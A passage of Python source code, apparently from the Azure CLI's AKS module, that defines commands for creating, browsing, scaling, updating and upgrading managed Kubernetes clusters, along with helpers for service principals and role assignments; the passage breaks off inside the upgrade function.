def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_D2s_v3",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=False,
attach_acr=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError('Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
api_server_access_profile=api_server_access_profile,
identity=identity
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = monitoring or (enable_managed_identity and attach_acr)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if (update_autoscaler != 1 and not update_lb_profile and
not attach_acr and
not detach_acr and
api_server_authorized_ip_ranges is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--dettach-acr" or'
'"--"api-server-authorized-ip-ranges')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, control_plane_only=False,
no_wait=False, **kwargs):
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
